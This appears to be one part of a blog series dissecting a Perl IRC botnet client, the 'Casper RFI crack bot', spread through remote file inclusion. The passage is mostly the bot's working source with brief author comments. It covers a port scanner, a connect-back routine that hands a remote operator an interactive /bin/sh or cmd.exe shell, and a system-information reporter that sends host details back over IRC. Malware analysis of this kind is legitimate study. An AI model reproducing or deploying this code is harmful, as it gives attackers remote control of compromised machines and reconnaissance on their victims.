Casper RFI crack bot – Part 13

There is a few more things that are worth looking at.

 if ($funcarg =~ /^portscan (.*)/) {
             my $hostip="$1";
             my @portas=("21","22","23","25","53","59","79","80","110","113","135","139","443","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
             my (@aberta, %porta_banner);
             foreach my $porta (@portas)  {
                my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
                if ($scansock) {
                   push (@aberta, $porta);
                   $scansock->close;
                }
             }

We can do some port scans and grab some banners

Here is the section for the connect back, /bin/sh or cmd.exe.

            # Conback.pl by Dominus Vis adaptada e adicionado suporte pra windows ;p
            elsif ($funcarg =~ /^conback\s+(.*)\s+(\d+)/) {
              my $host = "$1";
              my $porta = "$2";
              sendraw($IRC_cur_socket, "PRIVMSG $printl :02Conectando-se em02: $host:$porta");
              my $proto = getprotobyname('tcp');
              my $iaddr = inet_aton($host);
              my $paddr = sockaddr_in($porta, $iaddr);
              my $shell = "/bin/sh -i";
              if ($^O eq "MSWin32") {
                $shell = "cmd.exe";
              }
              socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
              connect(SOCKET, $paddr) or die "connect: $!";
              open(STDIN, ">&SOCKET");
              open(STDOUT, ">&SOCKET");
              open(STDERR, ">&SOCKET");
              system("$shell");
              close(STDIN);
              close(STDOUT);
              close(STDERR);
            }

This is handy.

           elsif ($funcarg =~ /^info/) {
           my $sysos = `uname -sr`;
           my $uptime = `uptime`;
           if ( $sysos =~ /freebsd/i ) {
           $sysname = `hostname`;
           $memory = `expr \`cat /var/run/dmesg.boot | grep "real memory" | cut -f5 -d" "\` \/ 1048576`;
           $swap = `$toploc | grep -i swap | cut -f2 -d" " | cut -f1 -d"M"`;
           chomp($memory);
           chomp($swap);
           }
           elsif ( $sysos =~ /linux/i ) {
           $sysname = `hostname -f`;
           $memory = `free -m |grep -i mem | awk '{print \$2}'`;
           $swap = `free -m |grep -i swap | awk '{print \$2}'`;
           chomp($swap);
           chomp($memory);
           }
           else {
           $sysname ="Not Found";;
           $memory ="Not found";
           $swap ="Not Found";
           }
           sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C15--- ^C3[^C01 SysInfo ^C3] ^C15-------------");
           sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C01os/host^C15^B;^B^C01 $sysos - $sysname ");
           sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C01proc/PID^C15^B;^B^C01 $processo - $$");
           sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C01uptime^C15^B;^B^C01 $uptime");
           sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C01memory/swap^C15^B;^B^C01 $memory - $swap");
           sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C01perl/bot^C15^B;^B^C01 $] - $VERSAO");
           sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C15--- ^C3[^C01 /SysInfo ^C3] ^C15------------");
           }